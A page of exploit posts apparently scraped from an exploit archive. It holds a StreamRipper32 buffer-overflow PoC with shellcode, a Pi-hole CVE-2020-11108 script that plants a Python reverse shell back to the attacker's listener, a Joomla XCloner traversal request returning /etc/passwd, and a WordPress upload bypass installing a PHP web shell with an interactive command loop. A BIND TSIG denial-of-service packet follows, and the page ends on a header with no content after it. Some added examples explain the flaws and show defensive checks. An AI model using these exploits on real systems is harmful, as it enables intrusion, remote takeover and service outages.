All posts published by ISHACK AI BOT
-
StreamRipper32 2.6 - Buffer Overflow (PoC)
# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
# Vendor Page: http://streamripper.sourceforge.net/
# Version: 2.6
# Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the contents of exploit.txt in "SongPattern"

# Bad Characters: \x00\x0A\x0D

file = open('exploit.txt', 'wb')
buf = b""
buf += b"A" * 256                   # filler up to the saved return address
buf += b"\x47\x23\x30\x74"          # 0x74302347 written little-endian: the return address overwrite
buf += b"\x90" * 30                 # NOP sled in front of the shellcode
# calc payload (encoded so that none of the bad characters appear)
buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5"
buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d"
buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73"
buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79"
buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8"
buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c"
buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1"
buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60"
buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6"
buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91"
buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf"
buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33"
buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c"
buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64"
buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1"
buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44"
buf += b"\x90" * (1000 - len(buf))  # pad the buffer to a fixed 1000 bytes
file.write(buf)
file.close()
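Added example, not part of Andy Bowden's PoC: a small layout checker for buffers of the shape the PoC builds (filler, return address, NOP sled, shellcode, padding to a fixed size). Before pasting a buffer into the target it is worth confirming the three properties the PoC relies on: the DWORD that lands in EIP sits exactly at the stated offset and decodes to the intended address, the total length is what the target expects, and none of the listed bad characters (\x00, \x0A, \x0D) appear anywhere in the buffer. The offset, address, sizes and bad characters are taken from the PoC; the sample shellcode is a constructed stand-in, not the calc payload.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # bad characters listed in the PoC header
OFFSET = 256                  # filler length before the return address in the PoC
RET_ADDR = 0x74302347         # return address the PoC uses
NOPS = 30                     # NOP sled length in the PoC
TOTAL_LEN = 1000              # fixed buffer size the PoC pads to


def build_buffer(shellcode, offset=OFFSET, ret_addr=RET_ADDR, nops=NOPS, total=TOTAL_LEN):
    """Assemble filler | ret | NOP sled | shellcode | NOP padding, the PoC's layout."""
    buf = b"A" * offset
    buf += struct.pack("<I", ret_addr)        # little-endian DWORD, as on x86
    buf += b"\x90" * nops
    buf += shellcode
    if len(buf) > total:
        raise ValueError("payload is %d bytes too long for a %d-byte buffer" % (len(buf) - total, total))
    return buf + b"\x90" * (total - len(buf))


def max_shellcode_len(offset=OFFSET, nops=NOPS, total=TOTAL_LEN):
    """Largest shellcode that still fits in the fixed-size buffer."""
    return total - offset - 4 - nops


def find_bad_chars(buf, bad=BAD_CHARS):
    """(offset, byte) for every bad character in buf, so the payload can be re-encoded."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def eip_at(buf, offset=OFFSET):
    """Decode the DWORD that overwrites the saved return address at `offset`."""
    return struct.unpack("<I", buf[offset:offset + 4])[0]


def check_layout(buf):
    eip = eip_at(buf)
    return {
        "length_ok": len(buf) == TOTAL_LEN,
        "eip": eip,
        "eip_ok": eip == RET_ADDR,
        "bad_chars": find_bad_chars(buf),
    }


if __name__ == "__main__":
    # Constructed stand-in for the calc shellcode: a few clean bytes plus one
    # deliberately bad byte (0x0a) so the checker has something to report.
    sample = b"\xdb\xc2\xbd\x72\x07" + b"\x0a" + b"\xcc" * 10
    report = check_layout(build_buffer(sample))
    print("EIP = 0x%08x, length ok: %s" % (report["eip"], report["length_ok"]))
    print("bad characters at:", report["bad_chars"])
```

The offsets reported by find_bad_chars are absolute positions in the buffer; subtract OFFSET + 4 + NOPS to get the position inside the shellcode that needs re-encoding.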
-
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Date: 2020-05-22
# Exploit Author: Photubias
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
# Version: Pi-hole <=4.4.0 + Web <=4.3.3
# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10)
# CVE: CVE-2020-11108

#!/usr/bin/env python3
'''
    Copyright 2020 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py

    File name CVE-2020-11108.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    ## Vulnerable setup instructions (from clean Debian 10-Buster):
    > apt update && apt install -y curl
    > curl -sSL https://install.pi-hole.net | bash
    > pihole checkout web release/v4.3.3
    > cd /etc/.pihole/ && git checkout v4.4
    > pihole -r ## Select reconfigure

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as on Linux (and probably macOS ;-)

    Features:
    * Does a reliable check before exploitation (not based on version numbers)
    * Performs normal RCE without Privilege Escalation (which is more trustworthy)
    * Asks before running Root RCE (as this overwrites certain files)
    * Performs a cleanup in all cases (success / failure)
'''
import urllib.request, urllib.parse, ssl, http.cookiejar, sys, string, random
import socket, _thread, time

## Default vars; change at will
_sURL = '192.168.50.130'
_sPASSWORD = '6DS4QtW5'
_iTIMEOUT = 5
_sLOCALIP = '192.168.50.1'
_sFILENAME = 'fun2.php'
_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first

## Ignore unsigned certs
ssl._create_default_https_context = ssl._create_unverified_context
## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

def randomString(iStringLength=8):
    sLetters = string.ascii_lowercase
    return ''.join(random.choice(sLetters) for i in range(iStringLength))

def postData(sURL, lData, bEncode = True):
    try:
        if bEncode: oData = urllib.parse.urlencode(lData).encode()
        else: oData = str(lData).encode()
        oRequest = urllib.request.Request(url = sURL, data = oData)
        return oOpener.open(oRequest, timeout = _iTIMEOUT)
    except:
        print('----- ERROR, site down?')
        sys.exit(1)

def getEndpoint():
    ## Normalise whatever the user gave us into http(s)://<host>/admin
    if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL
    else: sURL = _sURL
    if not sURL[-1] == '/': sURL += '/'    ## last character, not the string minus its last character
    if not '/admin' in sURL: sURL += 'admin'
    try:
        oRequest = urllib.request.Request(sURL)
        oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT)
    except:
        print('[-] Error: ' + sURL + ' not responding')
        sys.exit(1)
    if oResponse.code == 200:
        print('[+] Vulnerable URL is ' + sURL)
        return sURL
    else:
        print('[-] Error: ' + sURL + ' does not exist?')
        sys.exit(1)

def startListener(sPayload, iSockTimeout):
    ## Listener must always be on port 80, does not work otherwise
    ## Serves exactly one connection: the curl that gravity runs for our adlist entry
    oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print('[!] Binding to '+_sLOCALIP+':80')
    oSock.bind((_sLOCALIP,80))
    oSock.settimeout(iSockTimeout)
    oSock.listen()
    while True:
        try: oConn,sAddr= oSock.accept()
        except: break
        print('[+] Yes, we have an incoming connection from '+str(sAddr[0]))
        oConn.sendall(sPayload.encode())
        oConn.close()
        break
    oSock.close()
    print('[!] Closing Listener')

def doLogin(sURL, sPassword):
    sPath = '/index.php?login'
    lData = {'pw':sPassword}
    oResponse = postData(sURL + sPath, lData)
    sResult = oResponse.read().decode(errors='ignore')
    if 'Wrong password' in sResult:
        print('Wrong password')
        sys.exit(1)
    return True

def getToken(sURL):
    ## The blocklists tab embeds the CSRF token as <... id='token' hidden>TOKEN<...
    sPath = '/settings.php?tab=blocklists'
    oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
    sResult = oResponse.read().decode(errors='ignore')
    if 'id=\'token\'' in sResult:
        return sResult.split('id=\'token\' hidden>')[1].split('<')[0]
    else:
        print('[-] Error in getting a token')
        sys.exit(1)

def createBackdoor(sURL, sFilename):
    ## The adlist "URL" breaks out of the quoted curl argument: the injected
    ## -o <sFilename> makes curl write our listener's response to that file
    sToken = getToken(sURL)
    sPath = '/settings.php?tab=blocklists'
    lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'}
    #lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'}
    oResponse = postData(sURL + sPath, lData)
    if oResponse.code == 200:
        sResult = oResponse.read().decode(errors='ignore')
        arrBlocklists = sResult.split('target="_new"')
        sID = str(len(arrBlocklists)-2)
        print('[+] Creation success, ID is '+sID+'!')
        return sID
    else:
        return ''

def doUpdate(sURL):
    ## Triggers gravity, which fetches every adlist (and so runs the injected curl)
    sPath = '/scripts/pi-hole/php/gravity.sh.php'
    try:
        oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
        if oResponse.code == 200:
            print('[+] Update succeeded.')
            return True
    except:
        print('[-] Error; callback failed, maybe a firewall issue?')
        return False

def callExploit(sURL, sFilename = _sFILENAME):
    sPath = '/scripts/pi-hole/php/' + sFilename
    print('[+] Calling ' + sURL + sPath)
    try:
        oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
        if oResponse.code == 200:
            print('[+] Calling exploit succeeded.')
            print(oResponse.read().decode(errors='ignore'))
    except: pass

def removeEntry(sURL, sID):
    print('[+] Cleaning up now.')
    sToken = getToken(sURL)
    sPath = '/settings.php?tab=blocklists'
    lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'}
    oResponse = postData(sURL + sPath, lData)
    if oResponse.code == 200: print('[+] Remove success')

def main():
    global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>')
        print('    Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5')
        print('    But for now, I will ask questions')
        sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ')
        if not sAnswer == '': _sURL = sAnswer
        sAnswer = input('[?] Please enter your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ')
        if not sAnswer == '': _sLOCALIP = sAnswer
        sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ')
        if not sAnswer == '': _sPASSWORD = sAnswer
    else:
        _sURL = sys.argv[1]
        _sLOCALIP = sys.argv[2]
        _sPASSWORD = sys.argv[3]

    ## MAIN
    sURL = getEndpoint() ## Will also set the initial SessionID
    doLogin(sURL, _sPASSWORD)

    ## Creating backdoor (1) ## the old 'fun.php'
    sFilename = randomString() + '.php'
    sID = createBackdoor(sURL, sFilename)

    ## Launch first payload listener and send 200 OK
    _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))
    if doUpdate(sURL): print('[+] This system is vulnerable!')

    ## Question Time
    sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ')
    if not sAnswer.lower() == 'y':
        removeEntry(sURL, sID)
        sys.exit(0)
    sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ')
    if sAnswer.lower() == 'y': bRoot = True
    else: bRoot = False

    if bRoot:
        print('[!] Allright, going for the root shell')
        ## Launch payload listener and send root shell
        _sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>'''
        _thread.start_new_thread(startListener,(_sPayload,5,))
        doUpdate(sURL)
        ## Creating backdoor (2), overwriting teleporter.php
        sID2 = createBackdoor(sURL, 'teleporter.php')
        ## Launch payload listener for a new 200 OK
        _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))
        doUpdate(sURL)

    input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...')
    ## Launch shell payload listener:
    _sPayload = '''<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> ''' %(_sLOCALIP, _sLOCALNCPORT)
    #_sPayload = '''<?php system($_GET['cmd']); ?>''' ## this works perfectly, but the URL is authenticated
    _thread.start_new_thread(startListener,(_sPayload,5,))
    doUpdate(sURL)

    ## Launching the payload, will create new PHP file
    callExploit(sURL, sFilename)

    ## Remove entry again
    if bRoot: removeEntry(sURL, sID2)
    removeEntry(sURL, sID)
    if len(sys.argv) == 1: input('[+] All done, press enter to exit')

if __name__ == "__main__":
    main()
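Added example, not part of Photubias' exploit: why the adlist value `http://<listener>#" -o <file> -d "` works. The stand-in below assumes the list updater interpolates the adlist URL into one double-quoted shell string of the form `curl -s -L "<url>" -o "<outfile>"` and hands it to a shell; the real command line in gravity.sh is not shown on the page, and the output path `/etc/pihole/list.0.domains` is a constructed placeholder. shlex.split() reproduces the argument vector a POSIX shell would build, which shows the injected `-o` becoming a real curl option, and url_is_safe() is an example of the input check that would have stopped it (example policy, not Pi-hole's fix).

```python
import shlex
from urllib.parse import urlsplit

SHELL_SPECIAL = '"\'`$\\ \t\n;&|<>#'   # quote-breaking characters and shell metacharacters


def build_curl_command(url, outfile):
    # Hypothetical stand-in for the updater: the list URL ends up inside a double-quoted
    # argument of a shell string. Not gravity.sh's actual command line.
    return 'curl -s -L "%s" -o "%s"' % (url, outfile)


def argv_for(url, outfile="/etc/pihole/list.0.domains"):
    """The argument vector a POSIX shell derives from the interpolated string."""
    return shlex.split(build_curl_command(url, outfile))


def output_files(argv):
    """Every path curl is told to write: the operand following each -o."""
    return [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "-o"]


def url_is_safe(url):
    """Accept only http(s) URLs with a host and no characters that matter to a shell."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return not any(c in url for c in SHELL_SPECIAL)


if __name__ == "__main__":
    # The exploit's adlist entry, with the defaults used in the script above
    injected = 'http://192.168.50.1#" -o fun2.php -d "'
    argv = argv_for(injected)
    print("argv:", argv)
    print("files curl will write:", output_files(argv))
    print("rejected by url_is_safe:", not url_is_safe(injected))
    print("legitimate list accepted:", url_is_safe("https://example.com/hosts.txt"))
```

In the resulting argv the closing quote supplied by the attacker ends the URL at `http://192.168.50.1#`, after which `-o fun2.php` and `-d ""` are parsed as ordinary curl options; curl pairs the first `-o` with the first URL, so the listener's response body is written to fun2.php in the working directory of the updater.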
-
Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
# Date: 2020-05-10
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Exploit-Db Author ID: 8763
# Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/
# Vendor Homepage: http://www.xcloner.com
# Software Link: https://www.xcloner.com/support/download/
# Version: 3.5.3
# Tested on: Kali Linux - Apache2

--------------------------------------------------------------------------------
Detail:
--------------------------------------------------------------------------------
File: administrator/components/com_xcloner-backupandrestore/admin.cloner.php -->
------------
case 'download':
    downloadBackup($_REQUEST['file']);
    break;
-------------
The downloadBackup function is defined in administrator/components/com_xcloner-backupandrestore/cloner.functions.php

Vulnerable parameter: file

downloadBackup function's definition
--------------------------------------------------------------------------------
function downloadBackup($file)
{
    global $_CONFIG;
    // realpath() resolves the "../" sequences in $file, and the result is never
    // checked against clonerPath, so any file the web server can read is reachable
    $file = realpath($_CONFIG['clonerPath'] . "/$file");
    //First, see if the file exists
    if (!is_file($file)) {
        die("<b>404 File $file was not found!</b>");
    }
    //File Info
    $len = get_filesize($file);
    $filename = basename($file);
    $file_extension = strtolower(substr(strrchr($filename, "."), 1));
    // Set the Content-Type for the file in question
    switch ($file_extension) {
        default:
            $ctype = "application/force-download";
    }
    smartReadFile($file, $filename);
    exit;
}
--------------------------------------------------------------------------------
and smartReadFile function's definition
--------------------------------------------------------------------------------
function smartReadFile($location, $filename, $mimeType='application/octet-stream')
{
    if(!file_exists($location)) {
        header ("HTTP/1.0 404 Not Found");
        return;
    }
    $size=filesize($location);
    $time=date('r',filemtime($location));
    $fm=@fopen($location,'r');
    .
    .
    .
--------------------------------------------------------------------------------
PoC:
Request:
--------------------------------------------------------------------------------
GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1
--------------------------------------------------------------------------------
Response:
--------------------------------------------------------------------------------
HTTP/1.0 200 OK
Date: Sun, 10 May 2020 18:12:04 GMT
Server: Apache/2.4.41 (Debian)
Cache-Control: public, must-revalidate, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 3347
Content-Range: bytes 0-3347/3347
Content-Disposition: inline; filename=passwd
Content-Transfer-Encoding: binary
Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700
Connection: close
Content-Type: application/octet-stream

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
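Added example, not XCloner's code or its fix: the download handler above computes realpath(clonerPath . "/" . $file) and then only asks whether the result is a file, so "../" in `file` walks out of the backup directory. The containment check it lacks is shown here in Python: resolve the path, then require the resolved path to lie inside the resolved backup directory, using commonpath rather than a string-prefix test so that a sibling such as /backups_evil does not pass for /backups. The backup directory and files are constructed in a temporary directory so the example runs offline.

```python
import os
import tempfile


def vulnerable_backup_path(cloner_path, file):
    # Mirrors realpath($_CONFIG['clonerPath'] . "/$file"): ".." is resolved,
    # but nothing checks where the resolved path ended up
    return os.path.realpath(os.path.join(cloner_path, file))


def safe_backup_path(cloner_path, file):
    """Resolved path if it stays inside cloner_path, otherwise None."""
    base = os.path.realpath(cloner_path)
    target = os.path.realpath(os.path.join(base, file))
    # commonpath works on path components, so "/backups_evil/x" is not "inside" "/backups";
    # an absolute `file` makes join() discard base and is rejected the same way
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo():
    """Constructed layout: <tmp>/backups/site.tgz (legitimate) and <tmp>/secret.txt (outside)."""
    with tempfile.TemporaryDirectory() as tmp:
        backups = os.path.join(tmp, "backups")
        os.mkdir(backups)
        open(os.path.join(backups, "site.tgz"), "wb").close()   # constructed backup archive
        open(os.path.join(tmp, "secret.txt"), "wb").close()      # constructed file outside the backup dir
        traversal = "../secret.txt"
        return {
            "vulnerable_serves_outside_file": os.path.isfile(vulnerable_backup_path(backups, traversal)),
            "safe_rejects_traversal": safe_backup_path(backups, traversal) is None,
            "safe_allows_backup": safe_backup_path(backups, "site.tgz")
                                  == os.path.join(os.path.realpath(backups), "site.tgz"),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-32s %s" % (name, result))
```

The same check applies to the `basename`/`is_file` pattern in general: validating existence or type of a resolved path says nothing about whether the caller was entitled to reach it.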
-
WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : CVE-2020-12800

# Notes:
# At the time of disclosure, the WordPress plugin page listed more than 10,000 active installations
# The plugin was patched by the vendor within 24 hours of initial disclosure
# This exploit works by bypassing the allowed file types and the file type sanitization. If the uploads
# directory is browsable (the crawler below relies on that to locate the file), a PHP file with a reverse
# shell can be uploaded and accessed
# Any file type can be added to the "supported_type" parameter, which is supplied by the client
# The uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php get "_.txt" appended to the end, turning the upload into a text file
# This can be bypassed by adding '%' to the end of the allowed file type and to the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the PoC can easily be modified to gain a reverse shell

#!/usr/bin/python3
import string
import random
import requests
from bs4 import BeautifulSoup
import sys

payloadurl = ""

def RecurseLinks(base, file):
    # Walk the (browsable) uploads directory recursively until a link containing the random file name shows up
    global payloadurl
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"}
    f = requests.get(base, headers=headers)
    soup = BeautifulSoup(f.content, "html.parser")
    for root in soup.find_all("a"):
        href = root.get("href")
        if href is None or href.startswith("/"):
            continue                      # anchors without href and "parent directory" style links
        elif href.endswith("/"):
            RecurseLinks(base + href, file)
        else:
            if file in href:
                print("\n[+] File Found --> " + base + href)
                payloadurl = base + href

def main():
    print("WordPress Plugin 'Drag and Drop Multiple File Upload - Contact Form 7' 1.3.3.2 - Unauthenticated Remote Code Execution")
    print("@amartinsec --> Twitter\nCVE:2020-12800\n")

    # Build the request
    # Generate a random file name so the upload is easy to find afterwards
    file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))
    urlinput = input("[+] Enter url to the vulnerable WordPress application: ")

    # Find the nonce the plugin embeds in the page; it is sent back as the Ajax "security" field
    print("\n[+] Searching for security string nonce")
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
    homepage = requests.get(urlinput, headers=headers)
    homepage = homepage.text
    homepage = homepage.split("ajax_nonce\":\"", 1)[1]
    securitykey = homepage[:10]
    print("[+] Found security string --> " + securitykey)

    url = urlinput + "/wp-admin/admin-ajax.php"
    boundary = "---------------------------350278735926454076983690555601"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Accept": "application/json, text/javascript, */*; q=0.01",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "X-Requested-With": "XMLHttpRequest",
               "Content-Type": "multipart/form-data; boundary=" + boundary}
    # Multipart body: the client-supplied supported_type "php%" and the "<random>.php%" file name
    # pass the file type check, and the upload is then found on the server as <random>.php
    data = (
        "--" + boundary + "\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n"
        "php%\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n"
        "5242880\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n"
        "dnd_codedropz_upload\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n"
        "click\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n"
        + securitykey + "\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"upload-file\"; "
        "filename=\"" + file + ".php%\"\r\nContent-Type: text/plain\r\n\r\n"
        "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>"
        "\r\n--" + boundary + "--\r\n"
    )

    print("\n[+] Sending payload to target")
    response = requests.post(url, headers=headers, data=data)
    if response.status_code == 200:
        print("[+] Looks like a successful file upload!\n")
    elif response.status_code == 403:
        print("\nFile Upload Failed")
        print("403 in response. Check security string")
        sys.exit(1)
    else:
        print("File upload failed. Try the manual way with Burp")
        sys.exit(1)

    print("[+] Crawling for the uploaded file. This may take a minute...")
    print("[+] Searching for " + file + ".php")
    RecurseLinks(urlinput + "/wp-content/uploads/", file)
    if payloadurl == "":
        print("Can't find the file on the web server")
        print("Try the manual method")
        sys.exit(1)

    # If all goes well, we can now send requests for RCE
    print("[+] Success\n")
    while True:
        cmd = input("[+] CMD: ")
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
        request = requests.get(payloadurl + "?e=" + cmd, headers=headers)
        print(request.text)

if __name__ == "__main__":
    main()
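Added example, not the plugin's code or its patch: a model of the check-then-sanitize ordering that lets the '%' trick through, beside the ordering that closes it. The advisory establishes three facts: the allowed types come from the client-supplied `supported_type`, known-dangerous extensions get `_.txt` appended, and appending '%' to both the type and the file name yields a stored .php file. The model assumes the stored name is passed through a sanitizer that strips '%' (modelled on WordPress's sanitize_file_name(), which drops '%' among other characters) after the extension check has already run on the raw name; the plugin's actual source is not on the page. The denylist and server-side allowlist are constructed for the example.

```python
import re

# Constructed denylist of executable/active types for the model
DANGEROUS = {"php", "phtml", "php3", "php4", "php5", "phar", "js", "exe", "html", "htm"}
# Server-side policy: never taken from the request
SERVER_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "txt"}

# Characters dropped by the sanitizer (a subset of what sanitize_file_name() removes; '%' is among them)
_SPECIAL = re.compile(r"[?\[\]/\\=<>:;,'\"&$#*()|~`!{}%+]")


def sanitize_file_name(name):
    return _SPECIAL.sub("", name)


def extension(name):
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def naive_store_name(filename, supported_types):
    """Vulnerable ordering: check the raw name against the client's list, neutralise
    known-dangerous extensions, and only then sanitize the name for storage."""
    ext = extension(filename)
    allowed = {t.strip().lower() for t in supported_types}
    if ext not in allowed:
        return None                    # upload rejected
    if ext in DANGEROUS:
        filename += "_.txt"            # what the advisory describes for php uploads
    return sanitize_file_name(filename)


def hardened_store_name(filename, supported_types=None):
    """Fixed ordering: sanitize first, derive the extension from the name that will
    actually be stored, and compare it with a server-side allowlist. The client's
    supported_types is accepted for signature compatibility and ignored."""
    stored = sanitize_file_name(filename)
    ext = extension(stored)
    if ext not in SERVER_ALLOWLIST or ext in DANGEROUS:
        return None
    return stored


if __name__ == "__main__":
    cases = [("shell.php", ["php"]), ("shell.php%", ["php%"]), ("photo.jpg", ["jpg"])]
    for name, types in cases:
        print("%-12s naive=%-16s hardened=%s" % (name, naive_store_name(name, types), hardened_store_name(name)))
```

The general lesson is the same one a path-traversal check teaches: validate the value that will actually be used (the sanitized, stored name), not a representation that is transformed afterwards, and keep the allowlist on the server.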
-
BIND - 'TSIG' Denial of Service
#!/usr/bin/python
#coding:utf-8
from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG

# TSIG record with an empty MAC (mac_len=0, mac_data="") and the error field set to 16 (BADSIG),
# keyed to "local-ddns" (BIND's default session-key name), attached to an ordinary query
tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="",
                 time_signed=0, fudge=300, error=16)
dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)

answer = sr1(dns_req, verbose=0, timeout=5)
if answer is None:
    # No reply within the timeout: the server did not answer (or is no longer running)
    print("no answer from 127.0.0.1:53")
else:
    print(answer[DNS].summary())
-
Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
